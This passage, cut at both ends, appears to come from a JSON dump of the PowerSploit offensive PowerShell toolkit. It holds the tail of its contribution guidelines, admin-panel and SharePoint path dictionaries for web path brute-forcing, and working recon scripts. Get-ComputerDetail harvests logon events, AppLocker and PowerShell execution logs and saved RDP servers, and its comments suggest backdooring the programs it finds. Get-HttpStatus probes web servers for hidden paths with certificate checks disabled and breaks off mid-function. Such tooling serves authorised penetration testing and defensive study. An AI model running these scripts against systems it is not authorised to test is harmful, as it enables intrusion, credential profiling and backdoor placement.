costs**. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles:\n   * <http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspx>\n   * <http://technet.microsoft.com/en-us/library/ff730946.aspx>\n\n* If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'.\n\n* Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license).\n\n* Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis.\n\n* I prefer that variable names be capitalized and be as descriptive as possible.\n\n* Provide logical spacing in between your code. Indent your code to make it more readable.\n\n* If you find yourself repeating code, write a function.\n\n* Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error.\n\n* If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible.\n\n* Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to.\n\n* PowerShell v2 compatibility is highly desired.\n\n* Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following:\n   * `[Parameter(Position = 0, Mandatory = $True)]`\n\n* Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias.\n\n* Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break.\n\n* Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader.\n\n* Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement.\n\n* Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters.\n\n* If a script creates complex custom objects, include a ps1xml file that will properly format the object's output.\n"
  },
  {
    "path": "Recon/Dictionaries/admin.txt",
    "content": "admin1.php\r\nadmin.asp\r\nadmin/account.asp\r\nadmin/account.html\r\nadmin/account.php\r\nadmin/controlpanel.asp\r\nadmin/controlpanel.html\r\nadmin/controlpanel.php\r\nadmin/cp.asp\r\nadmin/cp.html\r\nadmin/cp.php\r\nadmin/home.asp\r\nadmin/home.php\r\nadmin/index.asp\r\nadmin/index.html\r\nadmin/login.asp\r\nadmin/login.html\r\nadmin/login.php\r\nadmin1.asp\r\nadmin1.html\r\nadmin1/\r\nadmin2.asp\r\nadmin2.html\r\nadmin2.php\r\nadmin4_account/\r\nadmin4_colon/\r\nadmincontrol.asp\r\nadmincontrol.html\r\nadmincontrol.php\r\nadminister/\r\nadministr8.asp\r\nadministr8.html\r\nadministr8.php\r\nadministr8/\r\nadministracao.php\r\nadministracao/\r\nadministracion.php\r\nadministracion/\r\nadministrateur.php\r\nadministrateur/\r\nadministratie/\r\nadministration.html\r\nadministration.php\r\nadministration/\r\nadministrator.asp\r\nadministrator.html\r\nadministrator.php\r\nadministrator/account.asp\r\nadministrator/account.html\r\nadministrator/account.php\r\nadministrator/index.asp\r\nadministrator/index.html\r\nadministrator/index.php\r\nadministrator/login.asp\r\nadministrator/login.html\r\nadministrator/login.php\r\nadministratoraccounts/\r\nadministrators/\r\nadministrivia/\r\nadminpanel.asp\r\nadminpanel.html\r\nadminpanel.php\r\nadminpro/\r\nadmins.asp\r\nadmins.html\r\nadmins.php\r\nadmins/\r\nAdminTools/\r\namministratore.php\r\namministratore/\r\nautologin/\r\nbanneradmin/\r\nbbadmin/\r\nbeheerder.php\r\nbeheerder/\r\nbigadmin/\r\nblogindex/\r\ncadmins/\r\nccms/\r\nccms/index.php\r\nccms/login.php\r\nccp14admin/\r\ncmsadmin/\r\nconfiguration/\r\nconfigure/\r\ncontrolpanel.asp\r\ncontrolpanel.html\r\ncontrolpanel.php\r\ncontrolpanel/\r\ncp.asp\r\ncp.html\r\ncp.php\r\ncpanel_file/\r\ncustomer_login/\r\ndatabase_administration/\r\nDatabase_Administration/\r\ndir-login/\r\ndirectadmin/\r\nezsqliteadmin/\r\nfileadmin.asp\r\nfileadmin.html\r\nfileadmin.php\r\nformslogin/\r\nglobes_admin/\r\nhpwebjetadmin/\r\nIndy_admin/\r\nirc-macadmin/\r\nLiveUser_Admin/\r\nlogin_db/\r\nlogin-redirect/\r\nlogin-us/\r\nlogin.asp\r\nlogin.html\r\nlogin.php\r\nlogin1/\r\nloginflat/\r\nlogo_sysadmin/\r\nLotus_Domino_Admin/\r\nmacadmin/\r\nmaintenance/\r\nmanuallogin/\r\nmemlogin/\r\nmeta_login/\r\nmodelsearch/login.asp\r\nmodelsearch/login.php\r\nmoderator.asp\r\nmoderator.html\r\nmoderator.php\r\nmoderator/\r\nmoderator/admin.asp\r\nmoderator/admin.html\r\nmoderator/admin.php\r\nmoderator/login.asp\r\nmoderator/login.html\r\nmoderator/login.php\r\nmyadmin/\r\nnavSiteAdmin/\r\nnewsadmin/\r\nopenvpnadmin/\r\npainel/\r\npanel/\r\npgadmin/\r\nphpldapadmin/\r\nphppgadmin/\r\nphpSQLiteAdmin/\r\nplatz_login/\r\npower_user/\r\nproject-admins/\r\npureadmin/\r\nradmind-1/\r\nradmind/\r\nrcLogin/\r\nserver_admin_small/\r\nServer.asp\r\nServer.html\r\nServer.php\r\nServerAdministrator/\r\nshowlogin/\r\nsimpleLogin/\r\nsmblogin/\r\nsql-admin/\r\nss_vms_admin_sm/\r\nsshadmin/\r\nstaradmin/\r\nsub-login/\r\nSuper-Admin/\r\nsupport_login/\r\nsys-admin/\r\nsysadmin.asp\r\nsysadmin.html\r\nsysadmin.php\r\nsysadmin/\r\nSysAdmin/\r\nSysAdmin2/\r\nsysadmins/\r\nsystem_administration/\r\nsystem-administration/\r\nur-admin.asp\r\nur-admin.html\r\nur-admin.php\r\nur-admin/\r\nuseradmin/\r\nUserLogin/\r\nutility_login/\r\nv2/painel/\r\nvadmind/\r\nvmailadmin/\r\nwebadmin.asp\r\nwebadmin.html\r\nwebadmin.php\r\nwebmaster/\r\nwebsvn/\r\nwizmysqladmin/\r\nwp-admin/\r\nwp-login/\r\nxlogin/\r\nyonetici.asp\r\nyonetici.html\r\nyonetici.php\r\nyonetim.asp\r\nyonetim.html\r\nyonetim.php"
  },
  {
    "path": "Recon/Dictionaries/sharepoint.txt",
    "content": "_catalogs/masterpage/Forms/AllItems.aspx\r\n_catalogs/wp/Forms/AllItems.aspx\r\n_catalogs/wt/Forms/Common.aspx\r\n_layouts/1033/IMAGES\r\n_layouts/aclinv.aspx\r\n_layouts/addrole.aspx\r\n_layouts/AdminRecycleBin.aspx\r\n_layouts/AreaNavigationSettings.aspx\r\n_Layouts/AreaTemplateSettings.aspx\r\n_Layouts/AreaWelcomePage.aspx\r\n_layouts/associatedgroups.aspx\r\n_layouts/bpcf.aspx\r\n_Layouts/ChangeSiteMasterPage.aspx\r\n_layouts/create.aspx\r\n_layouts/editgrp.aspx\r\n_layouts/editprms.aspx\r\n_layouts/groups.aspx\r\n_layouts/help.aspx\r\n_layouts/images/\r\n_layouts/listedit.aspx\r\n_layouts/ManageFeatures.aspx\r\n_layouts/ManageFeatures.aspx?Scope=Site\r\n_layouts/mcontent.aspx\r\n_layouts/mngctype.aspx\r\n_layouts/mngfield.aspx\r\n_layouts/mngsiteadmin.aspx\r\n_layouts/mngsubwebs.aspx\r\n_layouts/mngsubwebs.aspx?view=sites\r\n_layouts/mobile/mbllists.aspx\r\n_layouts/MyInfo.aspx\r\n_layouts/MyPage.aspx\r\n_layouts/MyTasks.aspx\r\n_layouts/navoptions.aspx\r\n_layouts/NewDwp.aspx\r\n_layouts/newgrp.aspx\r\n_layouts/newsbweb.aspx\r\n_layouts/PageSettings.aspx\r\n_layouts/people.aspx\r\n_layouts/people.aspx?MembershipGroupId=0\r\n_layouts/permsetup.aspx\r\n_layouts/picker.aspx\r\n_layouts/policy.aspx\r\n_layouts/policyconfig.aspx\r\n_layouts/policycts.aspx\r\n_layouts/Policylist.aspx\r\n_layouts/prjsetng.aspx\r\n_layouts/quiklnch.aspx\r\n_layouts/recyclebin.aspx\r\n_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage\r\n_layouts/role.aspx\r\n_layouts/settings.aspx\r\n_layouts/SiteDirectorySettings.aspx\r\n_layouts/sitemanager.aspx\r\n_Layouts/SiteManager.aspx?lro=all\r\n_layouts/spcf.aspx\r\n_layouts/storman.aspx\r\n_layouts/themeweb.aspx\r\n_layouts/topnav.aspx\r\n_layouts/user.aspx\r\n_layouts/userdisp.aspx\r\n_layouts/userdisp.aspx?ID=1\r\n_layouts/useredit.aspx\r\n_layouts/useredit.aspx?ID=1&Source=%2F%5Flayouts%2Fpeople%2Easpx\r\n_layouts/viewgrouppermissions.aspx\r\n_layouts/viewlsts.aspx\r\n_layouts/vsubwebs.aspx\r\n_layouts/WPPrevw.aspx?ID=247\r\n_layouts/wrkmng.aspx\r\n_vti_bin/Admin.asmx\r\n_vti_bin/alerts.asmx\r\n_vti_bin/dspsts.asmx\r\n_vti_bin/forms.asmx\r\n_vti_bin/Lists.asmx\r\n_vti_bin/people.asmx\r\n_vti_bin/Permissions.asmx\r\n_vti_bin/search.asmx\r\n_vti_bin/UserGroup.asmx\r\n_vti_bin/versions.asmx\r\n_vti_bin/Views.asmx\r\n_vti_bin/webpartpages.asmx\r\n_vti_bin/webs.asmx\r\n_vti_bin/spsdisco.aspx\r\n_vti_bin/AreaService.asmx\r\n_vti_bin/BusinessDataCatalog.asmx\r\n_vti_bin/ExcelService.asmx\r\n_vti_bin/SharepointEmailWS.asmx\r\n_vti_bin/spscrawl.asmx\r\n_vti_bin/spsearch.asmx\r\n_vti_bin/UserProfileService.asmx\r\n_vti_bin/WebPartPages.asmx\r\ndefault.aspx\r\nForms/DispForm.aspx\r\nForms/DispForm.aspx?ID=1\r\nForms/EditForm.aspx\r\nForms/EditForm.aspx?ID=1\r\nForms/Forms/AllItems.aspx\r\nForms/MyItems.aspx\r\nForms/NewForm.aspx\r\nPages/default.aspx\r\nPages/Forms/AllItems.aspx\r\nshared documents/forms/allitems.aspx"
  },
  {
    "path": "Recon/Get-ComputerDetail.ps1",
    "content": "function Get-ComputerDetail\n{\n<#\n.SYNOPSIS\n\nThis script is used to get useful information from a computer.\n\nFunction: Get-ComputerDetail  \nAuthor: Joe Bialek, Twitter: @JosephBialek  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nThis script is used to get useful information from a computer. Currently, the script gets the following information:\n-Explicit Credential Logons (Event ID 4648)\n-Logon events (Event ID 4624)\n-AppLocker logs to find what processes are created\n-PowerShell logs to find PowerShell scripts which have been executed\n-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to\n\n.PARAMETER ToString\n\nSwitch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.\n\t\n.EXAMPLE\n\nGet-ComputerDetail\nGets information about the computer and outputs it as PowerShell objects.\n\nGet-ComputerDetail -ToString\nGets information about the computer and outputs it as raw text.\n\n.NOTES\nThis script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.\nYou can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\n\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    Param(\n        [Parameter(Position=0)]\n        [Switch]\n        $ToString\n    )\n\n    Set-StrictMode -Version 2\n\n    $SecurityLog = Get-EventLog -LogName Security\n    $Filtered4624 = Find-4624Logon $SecurityLog\n    $Filtered4648 = Find-4648Logon $SecurityLog\n    $AppLockerLogs = Find-AppLockerLog\n    $PSLogs = Find-PSScriptsInPSAppLog\n    $RdpClientData = Find-RDPClientConnection\n\n    if ($ToString)\n    {\n        Write-Output \"Event ID 4624 (Logon):\"\n        Write-Output $Filtered4624.Values | Format-List\n        Write-Output \"Event ID 4648 (Explicit Credential Logon):\"\n        Write-Output $Filtered4648.Values | Format-List\n        Write-Output \"AppLocker Process Starts:\"\n        Write-Output $AppLockerLogs.Values | Format-List\n        Write-Output \"PowerShell Script Executions:\"\n        Write-Output $PSLogs.Values | Format-List\n        Write-Output \"RDP Client Data:\"\n        Write-Output $RdpClientData.Values | Format-List\n    }\n    else\n    {\n        $Properties = @{\n            LogonEvent4624 = $Filtered4624.Values\n            LogonEvent4648 = $Filtered4648.Values\n            AppLockerProcessStart = $AppLockerLogs.Values\n            PowerShellScriptStart = $PSLogs.Values\n            RdpClientData = $RdpClientData.Values\n        }\n\n        $ReturnObj = New-Object PSObject -Property $Properties\n        return $ReturnObj\n    }\n}\n\n\nfunction Find-4648Logon\n{\n<#\n.SYNOPSIS\n\nRetrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the\nthe account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful\nfor identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.\n\nFunction: Find-4648Logon  \nAuthor: Joe Bialek, Twitter: @JosephBialek  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nRetrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the\nthe account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful\nfor identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.\n\n.EXAMPLE\n\nFind-4648Logon\nGets the unique 4648 logon events.\n\n.NOTES\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\n#>\n\n    Param(\n        $SecurityLog\n    )\n\n    $ExplicitLogons = $SecurityLog | Where-Object {$_.InstanceID -eq 4648}\n    $ReturnInfo = @{}\n\n    foreach ($ExplicitLogon in $ExplicitLogons)\n    {\n        $Subject = $false\n        $AccountWhosCredsUsed = $false\n        $TargetServer = $false\n        $SourceAccountName = \"\"\n        $SourceAccountDomain = \"\"\n        $TargetAccountName = \"\"\n        $TargetAccountDomain = \"\"\n        $TargetServer = \"\"\n        foreach ($line in $ExplicitLogon.Message -split \"\\r\\n\")\n        {\n            if ($line -cmatch \"^Subject:$\")\n            {\n                $Subject = $true\n            }\n            elseif ($line -cmatch \"^Account\\sWhose\\sCredentials\\sWere\\sUsed:$\")\n            {\n                $Subject = $false\n                $AccountWhosCredsUsed = $true\n            }\n            elseif ($line -cmatch \"^Target\\sServer:\")\n            {\n                $AccountWhosCredsUsed = $false\n                $TargetServer = $true\n            }\n            elseif ($Subject -eq $true)\n            {\n                if ($line -cmatch \"\\s+Account\\sName:\\s+(\\S.*)\")\n                {\n                    $SourceAccountName = $Matches[1]\n                }\n                elseif ($line -cmatch \"\\s+Account\\sDomain:\\s+(\\S.*)\")\n                {\n                    $SourceAccountDomain = $Matches[1]\n                }\n            }\n            elseif ($AccountWhosCredsUsed -eq $true)\n            {\n                if ($line -cmatch \"\\s+Account\\sName:\\s+(\\S.*)\")\n                {\n                    $TargetAccountName = $Matches[1]\n                }\n                elseif ($line -cmatch \"\\s+Account\\sDomain:\\s+(\\S.*)\")\n                {\n                    $TargetAccountDomain = $Matches[1]\n                }\n            }\n            elseif ($TargetServer -eq $true)\n            {\n                if ($line -cmatch \"\\s+Target\\sServer\\sName:\\s+(\\S.*)\")\n                {\n                    $TargetServer = $Matches[1]\n                }\n            }\n        }\n\n        #Filter out logins that don't matter\n        if (-not ($TargetAccountName -cmatch \"^DWM-.*\" -and $TargetAccountDomain -cmatch \"^Window\\sManager$\"))\n        {\n            $Key = $SourceAccountName + $SourceAccountDomain + $TargetAccountName + $TargetAccountDomain + $TargetServer\n            if (-not $ReturnInfo.ContainsKey($Key))\n            {\n                $Properties = @{\n                    LogType = 4648\n                    LogSource = \"Security\"\n                    SourceAccountName = $SourceAccountName\n                    SourceDomainName = $SourceAccountDomain\n                    TargetAccountName = $TargetAccountName\n                    TargetDomainName = $TargetAccountDomain\n                    TargetServer = $TargetServer\n                    Count = 1\n                    Times = @($ExplicitLogon.TimeGenerated)\n                }\n\n                $ResultObj = New-Object PSObject -Property $Properties\n                $ReturnInfo.Add($Key, $ResultObj)\n            }\n            else\n            {\n                $ReturnInfo[$Key].Count++\n                $ReturnInfo[$Key].Times += ,$ExplicitLogon.TimeGenerated\n            }\n        }\n    }\n\n    return $ReturnInfo\n}\n\nfunction Find-4624Logon\n{\n<#\n.SYNOPSIS\n\nFind all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do\nnetwork logons in to the server, what accounts RDP in, what accounts log in locally, etc...\n\nFunction: Find-4624Logon  \nAuthor: Joe Bialek, Twitter: @JosephBialek  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nFind all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do\nnetwork logons in to the server, what accounts RDP in, what accounts log in locally, etc...\n\n.EXAMPLE\n\nFind-4624Logon\nFind unique 4624 logon events.\n\n.NOTES\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\n#>\n    Param (\n        $SecurityLog\n    )\n\n    $Logons = $SecurityLog | Where-Object {$_.InstanceID -eq 4624}\n    $ReturnInfo = @{}\n\n    foreach ($Logon in $Logons)\n    {\n        $SubjectSection = $false\n        $NewLogonSection = $false\n        $NetworkInformationSection = $false\n        $AccountName = \"\"\n        $AccountDomain = \"\"\n        $LogonType = \"\"\n        $NewLogonAccountName = \"\"\n        $NewLogonAccountDomain = \"\"\n        $WorkstationName = \"\"\n        $SourceNetworkAddress = \"\"\n        $SourcePort = \"\"\n\n        foreach ($line in $Logon.Message -Split \"\\r\\n\")\n        {\n            if ($line -cmatch \"^Subject:$\")\n            {\n                $SubjectSection = $true\n            }\n            elseif ($line -cmatch \"^Logon\\sType:\\s+(\\S.*)\")\n            {\n                $LogonType = $Matches[1]\n            }\n            elseif ($line -cmatch \"^New\\sLogon:$\")\n            {\n                $SubjectSection = $false\n                $NewLogonSection = $true\n            }\n            elseif ($line -cmatch \"^Network\\sInformation:$\")\n            {\n                $NewLogonSection = $false\n                $NetworkInformationSection = $true\n            }\n            elseif ($SubjectSection)\n            {\n                if ($line -cmatch \"^\\s+Account\\sName:\\s+(\\S.*)\")\n                {\n                    $AccountName = $Matches[1]\n                }\n                elseif ($line -cmatch \"^\\s+Account\\sDomain:\\s+(\\S.*)\")\n                {\n                    $AccountDomain = $Matches[1]\n                }\n            }\n            elseif ($NewLogonSection)\n            {\n                if ($line -cmatch \"^\\s+Account\\sName:\\s+(\\S.*)\")\n                {\n                    $NewLogonAccountName = $Matches[1]\n                }\n                elseif ($line -cmatch \"^\\s+Account\\sDomain:\\s+(\\S.*)\")\n                {\n                    $NewLogonAccountDomain = $Matches[1]\n                }\n            }\n            elseif ($NetworkInformationSection)\n            {\n                if ($line -cmatch \"^\\s+Workstation\\sName:\\s+(\\S.*)\")\n                {\n                    $WorkstationName = $Matches[1]\n                }\n                elseif ($line -cmatch \"^\\s+Source\\sNetwork\\sAddress:\\s+(\\S.*)\")\n                {\n                    $SourceNetworkAddress = $Matches[1]\n                }\n                elseif ($line -cmatch \"^\\s+Source\\sPort:\\s+(\\S.*)\")\n                {\n                    $SourcePort = $Matches[1]\n                }\n            }\n        }\n\n        #Filter out logins that don't matter\n        if (-not ($NewLogonAccountDomain -cmatch \"NT\\sAUTHORITY\" -or $NewLogonAccountDomain -cmatch \"Window\\sManager\"))\n        {\n            $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort\n            if (-not $ReturnInfo.ContainsKey($Key))\n            {\n                $Properties = @{\n                    LogType = 4624\n                    LogSource = \"Security\"\n                    SourceAccountName = $AccountName\n                    SourceDomainName = $AccountDomain\n                    NewLogonAccountName = $NewLogonAccountName\n                    NewLogonAccountDomain = $NewLogonAccountDomain\n                    LogonType = $LogonType\n                    WorkstationName = $WorkstationName\n                    SourceNetworkAddress = $SourceNetworkAddress\n                    SourcePort = $SourcePort\n                    Count = 1\n                    Times = @($Logon.TimeGenerated)\n                }\n\n                $ResultObj = New-Object PSObject -Property $Properties\n                $ReturnInfo.Add($Key, $ResultObj)\n            }\n            else\n            {\n                $ReturnInfo[$Key].Count++\n                $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated\n            }\n        }\n    }\n\n    return $ReturnInfo\n}\n\n\nfunction Find-AppLockerLog\n{\n<#\n.SYNOPSIS\n\nLook through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run).\n\nFunction: Find-AppLockerLog  \nAuthor: Joe Bialek, Twitter: @JosephBialek  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nLook through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run).\n\n.EXAMPLE\n\nFind-AppLockerLog\nFind process creations from AppLocker logs.\n\n.NOTES\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\n#>\n\n    $ReturnInfo = @{}\n\n    $AppLockerLogs = Get-WinEvent -LogName \"Microsoft-Windows-AppLocker/EXE and DLL\" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 8002}\n\n    foreach ($Log in $AppLockerLogs)\n    {\n        $SID = New-Object System.Security.Principal.SecurityIdentifier($Log.Properties[7].Value)\n        $UserName = $SID.Translate( [System.Security.Principal.NTAccount])\n\n        $ExeName = $Log.Properties[10].Value\n\n        $Key = $UserName.ToString() + \"::::\" + $ExeName\n\n        if (!$ReturnInfo.ContainsKey($Key))\n        {\n            $Properties = @{\n                Exe = $ExeName\n                User = $UserName.Value\n                Count = 1\n                Times = @($Log.TimeCreated)\n            }\n\n            $Item = New-Object PSObject -Property $Properties\n            $ReturnInfo.Add($Key, $Item)\n        }\n        else\n        {\n            $ReturnInfo[$Key].Count++\n            $ReturnInfo[$Key].Times += ,$Log.TimeCreated\n        }\n    }\n\n    return $ReturnInfo\n}\n\n\nFunction Find-PSScriptsInPSAppLog\n{\n<#\n.SYNOPSIS\n\nGo through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log).\nYou can then backdoor these scripts or do other malicious things.\n\nFunction: Find-AppLockerLog  \nAuthor: Joe Bialek, Twitter: @JosephBialek  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nGo through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log).\nYou can then backdoor these scripts or do other malicious things.\n\n.EXAMPLE\n\nFind-PSScriptsInPSAppLog\nFind unique PowerShell scripts being executed from the PowerShell operational log.\n\n.NOTES\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\n#>\n\n    $ReturnInfo = @{}\n    $Logs = Get-WinEvent -LogName \"Microsoft-Windows-PowerShell/Operational\" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 4100}\n\n    foreach ($Log in $Logs)\n    {\n        $LogDetails = $Log.Message -split \"`r`n\"\n\n        $FoundScriptName = $false\n        foreach($Line in $LogDetails)\n        {\n            if ($Line -imatch \"^\\s*Script\\sName\\s=\\s(.+)\")\n            {\n                $ScriptName = $Matches[1]\n                $FoundScriptName = $true\n            }\n            elseif ($Line -imatch \"^\\s*User\\s=\\s(.*)\")\n            {\n                $User = $Matches[1]\n            }\n        }\n\n        if ($FoundScriptName)\n        {\n            $Key = $ScriptName + \"::::\" + $User\n\n            if (!$ReturnInfo.ContainsKey($Key))\n            {\n                $Properties = @{\n                    ScriptName = $ScriptName\n                    UserName = $User\n                    Count = 1\n                    Times = @($Log.TimeCreated)\n                }\n\n                $Item = New-Object PSObject -Property $Properties\n                $ReturnInfo.Add($Key, $Item)\n            }\n            else\n            {\n                $ReturnInfo[$Key].Count++\n                $ReturnInfo[$Key].Times += ,$Log.TimeCreated\n            }\n        }\n    }\n\n    return $ReturnInfo\n}\n\n\nFunction Find-RDPClientConnection\n{\n<#\n.SYNOPSIS\n\nSearch the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user\nusually RDP's to.\n\nFunction: Find-RDPClientConnection  \nAuthor: Joe Bialek, Twitter: @JosephBialek  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nSearch the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user usually RDP's to.\n\n.EXAMPLE\n\nFind-RDPClientConnection\nFind unique saved RDP client connections.\n\n.NOTES\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\n#>\n    $ReturnInfo = @{}\n\n    New-PSDrive -Name HKU -PSProvider Registry -Root Registry::HKEY_USERS | Out-Null\n\n    #Attempt to enumerate the servers for all users\n    $Users = Get-ChildItem -Path \"HKU:\\\"\n    foreach ($UserSid in $Users.PSChildName)\n    {\n        $Servers = Get-ChildItem \"HKU:\\$($UserSid)\\Software\\Microsoft\\Terminal Server Client\\Servers\" -ErrorAction SilentlyContinue\n\n        foreach ($Server in $Servers)\n        {\n            $Server = $Server.PSChildName\n            $UsernameHint = (Get-ItemProperty -Path \"HKU:\\$($UserSid)\\Software\\Microsoft\\Terminal Server Client\\Servers\\$($Server)\").UsernameHint\n\n            $Key = $UserSid + \"::::\" + $Server + \"::::\" + $UsernameHint\n\n            if (!$ReturnInfo.ContainsKey($Key))\n            {\n                $SIDObj = New-Object System.Security.Principal.SecurityIdentifier($UserSid)\n                $User = ($SIDObj.Translate([System.Security.Principal.NTAccount])).Value\n\n                $Properties = @{\n                    CurrentUser = $User\n                    Server = $Server\n                    UsernameHint = $UsernameHint\n                }\n\n                $Item = New-Object PSObject -Property $Properties\n                $ReturnInfo.Add($Key, $Item)\n            }\n        }\n    }\n\n    return $ReturnInfo\n}\n"
  },
  {
    "path": "Recon/Get-HttpStatus.ps1",
    "content": "function Get-HttpStatus\r\n{\r\n<#\r\n.SYNOPSIS\r\n\r\nReturns the HTTP Status Codes and full URL for specified paths.\r\n\r\nPowerSploit Function: Get-HttpStatus  \r\nAuthor: Chris Campbell (@obscuresec)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None  \r\n\r\n.DESCRIPTION\r\n\r\nA script to check for the existence of a path or file on a webserver.\r\n\r\n.PARAMETER Target\r\n\r\nSpecifies the remote web host either by IP or hostname.\r\n\r\n.PARAMETER Path\r\n\r\nSpecifies the remost host.\r\n\r\n.PARAMETER Port\r\n\r\nSpecifies the port to connect to.\r\n\r\n.PARAMETER UseSSL\r\n\r\nUse an SSL connection.\r\n\r\n.EXAMPLE\r\n\r\nC:\\PS> Get-HttpStatus -Target www.example.com -Path c:\\dictionary.txt | Select-Object {where StatusCode -eq 20*}\r\n\r\n.EXAMPLE\r\n\r\nC:\\PS> Get-HttpStatus -Target www.example.com -Path c:\\dictionary.txt -UseSSL\r\n\r\n.NOTES\r\n\r\nHTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error\r\n\r\n.LINK\r\n\r\nhttp://obscuresecurity.blogspot.com\r\nhttp://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html\r\n#>\r\n\r\n    [CmdletBinding()] Param(\r\n        [Parameter(Mandatory = $True)]\r\n        [String]\r\n        $Target,\r\n\r\n        [String]\r\n        [ValidateNotNullOrEmpty()]\r\n        $Path = '.\\Dictionaries\\admin.txt',\r\n\r\n        [Int]\r\n        $Port,\r\n\r\n        [Switch]\r\n        $UseSSL\r\n    )\r\n\r\n    if (Test-Path $Path) {\r\n\r\n        if ($UseSSL -and $Port -eq 0) {\r\n            # Default to 443 if SSL is specified but no port is specified\r\n            $Port = 443\r\n        }\r\n        elseif ($Port -eq 0) {\r\n            # Default to port 80 if no port is specified\r\n            $Port = 80\r\n        }\r\n\r\n        $TcpConnection = New-Object System.Net.Sockets.TcpClient\r\n        Write-Verbose \"Path Test Succeeded - Testing Connectivity\"\r\n\r\n        try {\r\n            # Validate that the host is listening before scanning\r\n            $TcpConnection.Connect($Target, $Port)\r\n        }\r\n        catch {\r\n            Write-Error \"Connection Test Failed - Check Target\"\r\n            $Tcpconnection.Close()\r\n            Return\r\n        }\r\n\r\n        $Tcpconnection.Close()\r\n    }\r\n    else {\r\n           Write-Error \"Path Test Failed - Check Dictionary Path\"\r\n           Return\r\n    }\r\n\r\n    if ($UseSSL) {\r\n        $SSL = 's'\r\n        # Ignore invalid SSL certificates\r\n        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }\r\n    }\r\n    else {\r\n        $SSL = ''\r\n    }\r\n\r\n    if (($Port -eq 80) -or ($Port -eq 443)) {\r\n        $PortNum = ''\r\n    }\r\n    else {\r\n        $PortNum = \":$Port\"\r\n    }\r\n\r\n    # Check Http status for each entry in the doctionary file\r\n    foreach ($Item in Get-Content $Path) {\r\n\r\n        $WebTarget = \"http$($SSL)://$($Target)$($PortNum)/$($Item)\"\r\n        $URI = New-Object Uri($WebTarget)\r\n\r\n        try {\r\n            $WebRequest = [System.Net.WebRequest]::Create($URI)\r\n            $WebResponse = $WebRequest.GetResponse()\r\n            $WebStatus = $WebResponse.StatusCode\r\n            $WebResponse.Close()\r\n        }\r\n        catch {\r\n            $WebStatus = $Error[0].Exception.InnerException.Response.StatusCode\r\n\r\n            if (-not $WebStatus) {\r\n                # Not every exception returns a StatusCode.\r\n                # If that is the case, return the Status.\r\n                $WebStatus = 